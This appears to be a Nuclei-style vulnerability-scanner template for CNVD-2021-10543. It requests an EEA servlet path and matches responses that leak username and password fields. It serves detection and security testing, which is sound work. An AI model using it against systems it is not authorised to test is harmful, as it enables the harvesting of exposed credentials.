27 lines
515 B
YAML
27 lines
515 B
YAML
id: CNVD-2021-10543
|
|
|
|
info:
|
|
name: EEA Information Disclosure
|
|
author: pikpikcu
|
|
severity: high
|
|
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
|
|
tags: config,exposure,cnvd
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/authenticationserverservlet"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "<username>(.*?)</username>"
|
|
- "<password>(.*?)</password>"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|